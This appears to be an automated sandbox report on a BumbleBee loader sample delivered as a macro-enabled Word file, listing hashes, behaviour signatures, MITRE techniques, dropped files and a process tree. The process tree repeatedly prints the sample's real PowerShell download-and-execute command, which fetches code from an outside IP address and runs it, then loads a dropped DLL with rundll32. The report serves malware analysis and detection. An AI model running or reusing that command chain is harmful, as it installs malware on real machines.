bumblebee | 8b0ef4e50ddad2036e3d85e87a0cd53e3ae0a436ea4fff99fd4ddb845e4f265f

Analysis

max time kernel
149s
max time network
150s
platform
windows10-2004_x64
resource
win10v2004-20240226-en
resource tags

arch:x64arch:x86image:win10v2004-20240226-enlocale:en-usos:windows10-2004-x64system
submitted
20-03-2024 09:25

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

434775.docm
Size

53KB
MD5

8361467d6ef12ab5cdc89ac03eda2630
SHA1

778a76a890425fa2ffa81cc46aedbee761bfdae2
SHA256

8b0ef4e50ddad2036e3d85e87a0cd53e3ae0a436ea4fff99fd4ddb845e4f265f
SHA512

fdab4e67756e2a7a8a0813eeabeeb5d8699eb702c0e04c1c31c8ec32f0189a6638f4e88cbe4ff34259075b98ccc33108236ca1dc969200a0e0f1475480dc11c9
SSDEEP

1536:JbxVjYWdp4RvikgWUNXRIDBXceQ2JKAgMY+9/w0G:mv5g3NXRI/Q2BJYQM

Score

10^/10

bumblebee asd123 loader

Malware Config

Extracted

Family

bumblebee

Botnet

asd123

rc4.plain

Signatures

BumbleBee
BumbleBee is a loader malware written in C++.
loader bumblebee

Process spawned unexpected child process 5 IoCs

This typically indicates the parent process was compromised via an exploit or macro.

description	pid	pid_target	Process	procid_target
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	728	4944	wscript.exe	87
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2604	4944	wscript.exe	87
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1220	4944	wscript.exe	87
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	3816	4944	wscript.exe	87
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1548	4944	wscript.exe	87

Blocklisted process makes network request 11 IoCs

flow	pid	Process
87	3212	powershell.exe
90	4056	rundll32.exe
92	2824	powershell.exe
94	4056	rundll32.exe
96	4008	powershell.exe
98	4056	rundll32.exe
101	4056	rundll32.exe
103	2696	powershell.exe
105	4056	rundll32.exe
110	3244	powershell.exe
113	4056	rundll32.exe

Checks computer location settings 2 TTPs 5 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-566096764-1992588923-1249862864-1000\Control Panel\International\Geo\Nation	wscript.exe
Key value queried	\REGISTRY\USER\S-1-5-21-566096764-1992588923-1249862864-1000\Control Panel\International\Geo\Nation	wscript.exe
Key value queried	\REGISTRY\USER\S-1-5-21-566096764-1992588923-1249862864-1000\Control Panel\International\Geo\Nation	wscript.exe
Key value queried	\REGISTRY\USER\S-1-5-21-566096764-1992588923-1249862864-1000\Control Panel\International\Geo\Nation	wscript.exe
Key value queried	\REGISTRY\USER\S-1-5-21-566096764-1992588923-1249862864-1000\Control Panel\International\Geo\Nation	wscript.exe

Loads dropped DLL 5 IoCs

pid	Process
4056	rundll32.exe
1208	rundll32.exe
4516	rundll32.exe
2616	rundll32.exe
2864	rundll32.exe

Suspicious use of NtCreateThreadExHideFromDebugger 4 IoCs

pid	Process
4056	rundll32.exe
1208	rundll32.exe
4516	rundll32.exe
2616	rundll32.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Checks processor information in registry 2 TTPs 3 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	WINWORD.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	WINWORD.EXE
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	WINWORD.EXE

Enumerates system info in registry 2 TTPs 3 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	WINWORD.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily	WINWORD.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	WINWORD.EXE

Suspicious behavior: AddClipboardFormatListener 2 IoCs

pid	Process
3836	WINWORD.EXE
3836	WINWORD.EXE

Suspicious behavior: EnumeratesProcesses 12 IoCs

pid	Process
3212	powershell.exe
3212	powershell.exe
2824	powershell.exe
2824	powershell.exe
2824	powershell.exe
4008	powershell.exe
4008	powershell.exe
4008	powershell.exe
2696	powershell.exe
2696	powershell.exe
3244	powershell.exe
3244	powershell.exe

Suspicious use of AdjustPrivilegeToken 5 IoCs

description	pid	Process
Token: SeDebugPrivilege	3212	powershell.exe
Token: SeDebugPrivilege	2824	powershell.exe
Token: SeDebugPrivilege	4008	powershell.exe
Token: SeDebugPrivilege	2696	powershell.exe
Token: SeDebugPrivilege	3244	powershell.exe

Suspicious use of SetWindowsHookEx 7 IoCs

pid	Process
3836	WINWORD.EXE
3836	WINWORD.EXE
3836	WINWORD.EXE
3836	WINWORD.EXE
3836	WINWORD.EXE
3836	WINWORD.EXE
3836	WINWORD.EXE

Suspicious use of WriteProcessMemory 20 IoCs

description	pid	Process	procid_target
PID 728 wrote to memory of 3212	728	wscript.exe	113
PID 728 wrote to memory of 3212	728	wscript.exe	113
PID 3212 wrote to memory of 4056	3212	powershell.exe	115
PID 3212 wrote to memory of 4056	3212	powershell.exe	115
PID 2604 wrote to memory of 2824	2604	wscript.exe	117
PID 2604 wrote to memory of 2824	2604	wscript.exe	117
PID 2824 wrote to memory of 1208	2824	powershell.exe	119
PID 2824 wrote to memory of 1208	2824	powershell.exe	119
PID 1220 wrote to memory of 4008	1220	wscript.exe	121
PID 1220 wrote to memory of 4008	1220	wscript.exe	121
PID 4008 wrote to memory of 4516	4008	powershell.exe	123
PID 4008 wrote to memory of 4516	4008	powershell.exe	123
PID 3816 wrote to memory of 2696	3816	wscript.exe	127
PID 3816 wrote to memory of 2696	3816	wscript.exe	127
PID 2696 wrote to memory of 2616	2696	powershell.exe	129
PID 2696 wrote to memory of 2616	2696	powershell.exe	129
PID 1548 wrote to memory of 3244	1548	wscript.exe	131
PID 1548 wrote to memory of 3244	1548	wscript.exe	131
PID 3244 wrote to memory of 2864	3244	powershell.exe	133
PID 3244 wrote to memory of 2864	3244	powershell.exe	133

C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE
"C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\434775.docm" /o ""
1⤵
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
PID:3836

C:\Windows\system32\wscript.exe
wscript /E:vbscript C:\Users\Admin\AppData\Local\Temp\radE9EA1.tmp
1⤵
- Process spawned unexpected child process
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:728
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -exec bypass -c "(New-Object Net.WebClient).Proxy.Credentials=[Net.CredentialCache]::DefaultNetworkCredentials;iwr('http://192.121.17.93/update_ver')|iex"
  2⤵
  - Blocklisted process makes network request
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:3212
- - C:\Windows\system32\rundll32.exe
    "C:\Windows\system32\rundll32.exe" C:\Users\Admin\AppData\Local\Temp\w_ver.dll DllRegisterServer
    3⤵
    - Blocklisted process makes network request
    - Loads dropped DLL
    - Suspicious use of NtCreateThreadExHideFromDebugger
    PID:4056

C:\Windows\system32\wscript.exe
wscript /E:vbscript C:\Users\Admin\AppData\Local\Temp\radF05C2.tmp
1⤵
- Process spawned unexpected child process
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:2604
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -exec bypass -c "(New-Object Net.WebClient).Proxy.Credentials=[Net.CredentialCache]::DefaultNetworkCredentials;iwr('http://192.121.17.93/update_ver')|iex"
  2⤵
  - Blocklisted process makes network request
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:2824
- - C:\Windows\system32\rundll32.exe
    "C:\Windows\system32\rundll32.exe" C:\Users\Admin\AppData\Local\Temp\w_ver.dll DllRegisterServer
    3⤵
    - Loads dropped DLL
    - Suspicious use of NtCreateThreadExHideFromDebugger
    PID:1208

C:\Windows\system32\wscript.exe
wscript /E:vbscript C:\Users\Admin\AppData\Local\Temp\rad67B23.tmp
1⤵
- Process spawned unexpected child process
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:1220
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -exec bypass -c "(New-Object Net.WebClient).Proxy.Credentials=[Net.CredentialCache]::DefaultNetworkCredentials;iwr('http://192.121.17.93/update_ver')|iex"
  2⤵
  - Blocklisted process makes network request
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:4008
- - C:\Windows\system32\rundll32.exe
    "C:\Windows\system32\rundll32.exe" C:\Users\Admin\AppData\Local\Temp\w_ver.dll DllRegisterServer
    3⤵
    - Loads dropped DLL
    - Suspicious use of NtCreateThreadExHideFromDebugger
    PID:4516

C:\Windows\system32\wscript.exe
wscript /E:vbscript C:\Users\Admin\AppData\Local\Temp\radF2D91.tmp
1⤵
- Process spawned unexpected child process
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:3816
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -exec bypass -c "(New-Object Net.WebClient).Proxy.Credentials=[Net.CredentialCache]::DefaultNetworkCredentials;iwr('http://192.121.17.93/update_ver')|iex"
  2⤵
  - Blocklisted process makes network request
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:2696
- - C:\Windows\system32\rundll32.exe
    "C:\Windows\system32\rundll32.exe" C:\Users\Admin\AppData\Local\Temp\w_ver.dll DllRegisterServer
    3⤵
    - Loads dropped DLL
    - Suspicious use of NtCreateThreadExHideFromDebugger
    PID:2616

C:\Windows\system32\wscript.exe
wscript /E:vbscript C:\Users\Admin\AppData\Local\Temp\radD1B37.tmp
1⤵
- Process spawned unexpected child process
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:1548
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -exec bypass -c "(New-Object Net.WebClient).Proxy.Credentials=[Net.CredentialCache]::DefaultNetworkCredentials;iwr('http://192.121.17.93/update_ver')|iex"
  2⤵
  - Blocklisted process makes network request
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:3244
- - C:\Windows\system32\rundll32.exe
    "C:\Windows\system32\rundll32.exe" C:\Users\Admin\AppData\Local\Temp\w_ver.dll DllRegisterServer
    3⤵
    - Loads dropped DLL
    PID:2864

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
3KB

MD5
556084f2c6d459c116a69d6fedcc4105

SHA1
633e89b9a1e77942d822d14de6708430a3944dbc

SHA256
88cc4f40f0eb08ff5c487d6db341b046cc63b22534980aca66a9f8480692f3a8

SHA512
0f6557027b098e45556af93e0be1db9a49c6416dc4afcff2cc2135a8a1ad4f1cf7185541ddbe6c768aefaf2c1a8e52d5282a538d15822d19932f22316edd283e

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
bbad59fd06310773f926b8c529002267

SHA1
792cafee7795533544c5bde8fd9f8e2ac5d9a083

SHA256
78a4d72e5865388ec2797f56713d32f0feef5c1ff4e006c265a559e5c890a8c4

SHA512
4cd761f0413e5844259e8cdb88e765c53bd3acaa5abd3f2db69f8a00898efa90c82fe652dd8d647484066763ebb558fb45e7f29b93c16fefbe80242e787441dc

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
2564df41d7c76389ff667383105aac61

SHA1
ef1fe8b3d181e9135f8de2836e6ab2281d915004

SHA256
1c3adec7c91bcd8c7d7c35f637ec8ee3a433b966e6f5c9fcc5529726b5c2bfd4

SHA512
23d2001b54b6d9b7a17f67730d495a8c8acc46e80f81bd0c27f9d262edc7512ea23d5231a5a606d3376bff85a25c87b4c8165c8ec5f3a5a8478bd7d5c5651952

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
1a39c18554934730b60a3ac2ede06158

SHA1
5d65dfe8a22d6e6e5ed965fa314dc8799bc14d7b

SHA256
cce07c5394ccce0eb2be9afc08b6359c1675625de30c3f479ffd445c36076dd2

SHA512
e08ab7bdcc4354d1160f53760ce9b3ef31a1d1cbc093b3d310f5bc0f52803a52cc6ebe888b23ac5988bc7b555e94031d50a50d6b1a0ff37fff5f12a463d1468a

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
78cbc1399d944adf4aebf17f4571ca50

SHA1
1a555fbc4b5bab26d0b2508a081af3380049e172

SHA256
482616556214a15c5d65c10a5fd0130f11562536b9d2d9efa30fb59734ac52bc

SHA512
9898951fedc428371fa6a5cfb169f0e33d4c0a3f22a62f75b5d02f6948c9bd1c256d7361fa63bacc8ce11c507aec64bcde099ed37e6d37052dd62e9ccd235ba4

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_zcbayobi.stc.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Local\Temp\radE9EA1.tmp

Filesize
237B

MD5
2d8a9d6cbd295e7e3ef5db8edbd0b765

SHA1
461b708cd202a2f7b9730ec2bdb14c0df7ab5bb0

SHA256
243f6e690985e84e9056fa67850920281431fe76c368ae9ef72a241c5594ea5d

SHA512
720d70128caf0bc9668d0411023a8ac79708fce3e49ce08e7e037011de6e157452dadc29913d801c6699d0cb0836a25b67eaadecb8884e2e2f5fa41be0a9e76e

Download Submit
C:\Users\Admin\AppData\Local\Temp\w_ver.dll

Filesize
3.8MB

MD5
a717330076ea1feb85ec0a4febd8c25f

SHA1
4505163a8ba330be2ec92d026be02487cf90829d

SHA256
d511b138363d9308f3e78731a6aab1e8860cca3e4b77120bc5d2d9d947632a36

SHA512
f763cab1653794057e5efc803604a8173e7079970a805d781f02a6f84bc9d347775ff09f4ca15023ef8b379cdeb9ee6926e1d4422a29c5fb5d301d1e17b7bc9b

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\UProof\ExcludeDictionaryEN0409.lex

Filesize
2B

MD5
f3b25701fe362ec84616a93a45ce9998

SHA1
d62636d8caec13f04e28442a0a6fa1afeb024bbb

SHA256
b3d510ef04275ca8e698e5b3cbb0ece3949ef9252f0cdc839e9ee347409a2209

SHA512
98c5f56f3de340690c139e58eb7dac111979f0d4dffe9c4b24ff849510f4b6ffa9fd608c0a3de9ac3c9fd2190f0efaf715309061490f9755a9bfdf1c54ca0d84

Download Submit
memory/1208-136-0x000002AE73220000-0x000002AE73457000-memory.dmp

Filesize
2.2MB

Download
memory/1208-137-0x00007FFE96390000-0x00007FFE96585000-memory.dmp

Filesize
2.0MB

Download
memory/1208-135-0x000002AE73460000-0x000002AE73678000-memory.dmp

Filesize
2.1MB

Download
memory/1208-138-0x00007FFE96390000-0x00007FFE96585000-memory.dmp

Filesize
2.0MB

Download
memory/1208-139-0x00007FFE96390000-0x00007FFE96585000-memory.dmp

Filesize
2.0MB

Download
memory/1208-140-0x00007FFE96390000-0x00007FFE96585000-memory.dmp

Filesize
2.0MB

Download
memory/1208-141-0x00007FFE96390000-0x00007FFE96585000-memory.dmp

Filesize
2.0MB

Download
memory/2616-193-0x0000027A0A4A0000-0x0000027A0A6B8000-memory.dmp

Filesize
2.1MB

Download
memory/2824-134-0x00007FFE67C70000-0x00007FFE68731000-memory.dmp

Filesize
10.8MB

Download
memory/2824-131-0x000001BA5DDC0000-0x000001BA5DDD0000-memory.dmp

Filesize
64KB

Download
memory/2824-130-0x000001BA5DDC0000-0x000001BA5DDD0000-memory.dmp

Filesize
64KB

Download
memory/2824-127-0x000001BA5DDC0000-0x000001BA5DDD0000-memory.dmp

Filesize
64KB

Download
memory/2824-126-0x00007FFE67C70000-0x00007FFE68731000-memory.dmp

Filesize
10.8MB

Download
memory/3212-94-0x0000029A7EFA0000-0x0000029A7EFB0000-memory.dmp

Filesize
64KB

Download
memory/3212-87-0x0000029A7EEE0000-0x0000029A7EF02000-memory.dmp

Filesize
136KB

Download
memory/3212-102-0x00007FFE67C70000-0x00007FFE68731000-memory.dmp

Filesize
10.8MB

Download
memory/3212-95-0x0000029A7FD20000-0x0000029A804C6000-memory.dmp

Filesize
7.6MB

Download
memory/3212-93-0x0000029A7EFA0000-0x0000029A7EFB0000-memory.dmp

Filesize
64KB

Download
memory/3212-92-0x00007FFE67C70000-0x00007FFE68731000-memory.dmp

Filesize
10.8MB

Download
memory/3836-19-0x00007FFE96390000-0x00007FFE96585000-memory.dmp

Filesize
2.0MB

Download
memory/3836-79-0x00000169BFAF0000-0x00000169C0AC0000-memory.dmp

Filesize
15.8MB

Download
memory/3836-64-0x00000169BFAF0000-0x00000169C0AC0000-memory.dmp

Filesize
15.8MB

Download
memory/3836-65-0x00000169BA390000-0x00000169BA790000-memory.dmp

Filesize
4.0MB

Download
memory/3836-66-0x00000169BFAF0000-0x00000169C0AC0000-memory.dmp

Filesize
15.8MB

Download
memory/3836-78-0x00000169BFAF0000-0x00000169C0AC0000-memory.dmp

Filesize
15.8MB

Download
memory/3836-16-0x00007FFE96390000-0x00007FFE96585000-memory.dmp

Filesize
2.0MB

Download
memory/3836-21-0x00007FFE96390000-0x00007FFE96585000-memory.dmp

Filesize
2.0MB

Download
memory/3836-80-0x00000169BFAF0000-0x00000169C0AC0000-memory.dmp

Filesize
15.8MB

Download
memory/3836-62-0x00007FFE96390000-0x00007FFE96585000-memory.dmp

Filesize
2.0MB

Download
memory/3836-17-0x00007FFE96390000-0x00007FFE96585000-memory.dmp

Filesize
2.0MB

Download
memory/3836-61-0x00007FFE96390000-0x00007FFE96585000-memory.dmp

Filesize
2.0MB

Download
memory/3836-22-0x00007FFE96390000-0x00007FFE96585000-memory.dmp

Filesize
2.0MB

Download
memory/3836-0-0x00007FFE56410000-0x00007FFE56420000-memory.dmp

Filesize
64KB

Download
memory/3836-43-0x00000169BFAF0000-0x00000169C0AC0000-memory.dmp

Filesize
15.8MB

Download
memory/3836-20-0x00007FFE96390000-0x00007FFE96585000-memory.dmp

Filesize
2.0MB

Download
memory/3836-42-0x00000169BA390000-0x00000169BA790000-memory.dmp

Filesize
4.0MB

Download
memory/3836-2-0x00007FFE56410000-0x00007FFE56420000-memory.dmp

Filesize
64KB

Download
memory/3836-1-0x00007FFE56410000-0x00007FFE56420000-memory.dmp

Filesize
64KB

Download
memory/3836-15-0x00007FFE96390000-0x00007FFE96585000-memory.dmp

Filesize
2.0MB

Download
memory/3836-4-0x00007FFE56410000-0x00007FFE56420000-memory.dmp

Filesize
64KB

Download
memory/3836-161-0x00000169BFAF0000-0x00000169C0AC0000-memory.dmp

Filesize
15.8MB

Download
memory/3836-5-0x00007FFE96390000-0x00007FFE96585000-memory.dmp

Filesize
2.0MB

Download
memory/3836-3-0x00007FFE96390000-0x00007FFE96585000-memory.dmp

Filesize
2.0MB

Download
memory/3836-7-0x00007FFE56410000-0x00007FFE56420000-memory.dmp

Filesize
64KB

Download
memory/3836-112-0x00000169BFAF0000-0x00000169C0AC0000-memory.dmp

Filesize
15.8MB

Download
memory/3836-34-0x00000169BFAF0000-0x00000169C0AC0000-memory.dmp

Filesize
15.8MB

Download
memory/3836-18-0x00007FFE96390000-0x00007FFE96585000-memory.dmp

Filesize
2.0MB

Download
memory/3836-125-0x00000169BFAF0000-0x00000169C0AC0000-memory.dmp

Filesize
15.8MB

Download
memory/3836-63-0x00007FFE96390000-0x00007FFE96585000-memory.dmp

Filesize
2.0MB

Download
memory/3836-6-0x00007FFE96390000-0x00007FFE96585000-memory.dmp

Filesize
2.0MB

Download
memory/3836-128-0x00000169BFAF0000-0x00000169C0AC0000-memory.dmp

Filesize
15.8MB

Download
memory/3836-14-0x00007FFE96390000-0x00007FFE96585000-memory.dmp

Filesize
2.0MB

Download
memory/3836-13-0x00007FFE54150000-0x00007FFE54160000-memory.dmp

Filesize
64KB

Download
memory/3836-11-0x00007FFE54150000-0x00007FFE54160000-memory.dmp

Filesize
64KB

Download
memory/3836-12-0x00007FFE96390000-0x00007FFE96585000-memory.dmp

Filesize
2.0MB

Download
memory/3836-10-0x00007FFE96390000-0x00007FFE96585000-memory.dmp

Filesize
2.0MB

Download
memory/3836-9-0x00007FFE96390000-0x00007FFE96585000-memory.dmp

Filesize
2.0MB

Download
memory/3836-8-0x00007FFE96390000-0x00007FFE96585000-memory.dmp

Filesize
2.0MB

Download
memory/4008-160-0x0000017132950000-0x0000017132960000-memory.dmp

Filesize
64KB

Download
memory/4008-159-0x0000017132950000-0x0000017132960000-memory.dmp

Filesize
64KB

Download
memory/4008-164-0x00007FFE67C70000-0x00007FFE68731000-memory.dmp

Filesize
10.8MB

Download
memory/4008-146-0x00007FFE67C70000-0x00007FFE68731000-memory.dmp

Filesize
10.8MB

Download
memory/4008-150-0x0000017132950000-0x0000017132960000-memory.dmp

Filesize
64KB

Download
memory/4008-155-0x0000017132950000-0x0000017132960000-memory.dmp

Filesize
64KB

Download
memory/4056-103-0x000002272E360000-0x000002272E578000-memory.dmp

Filesize
2.1MB

Download
memory/4056-110-0x00007FFE96390000-0x00007FFE96585000-memory.dmp

Filesize
2.0MB

Download
memory/4056-105-0x00007FFE96390000-0x00007FFE96585000-memory.dmp

Filesize
2.0MB

Download
memory/4056-107-0x000002272E360000-0x000002272E578000-memory.dmp

Filesize
2.1MB

Download
memory/4056-108-0x00007FFE96390000-0x00007FFE96585000-memory.dmp

Filesize
2.0MB

Download
memory/4056-109-0x00007FFE96390000-0x00007FFE96585000-memory.dmp

Filesize
2.0MB

Download
memory/4056-106-0x00007FFE96390000-0x00007FFE96585000-memory.dmp

Filesize
2.0MB

Download
memory/4056-104-0x000002272E120000-0x000002272E357000-memory.dmp

Filesize
2.2MB

Download
memory/4056-158-0x00007FFE96390000-0x00007FFE96585000-memory.dmp

Filesize
2.0MB

Download
memory/4516-165-0x000001B0639A0000-0x000001B063BB8000-memory.dmp

Filesize
2.1MB

Download
memory/4516-166-0x000001B063760000-0x000001B063997000-memory.dmp

Filesize
2.2MB

Download
memory/4516-167-0x00007FFE96390000-0x00007FFE96585000-memory.dmp

Filesize
2.0MB

Download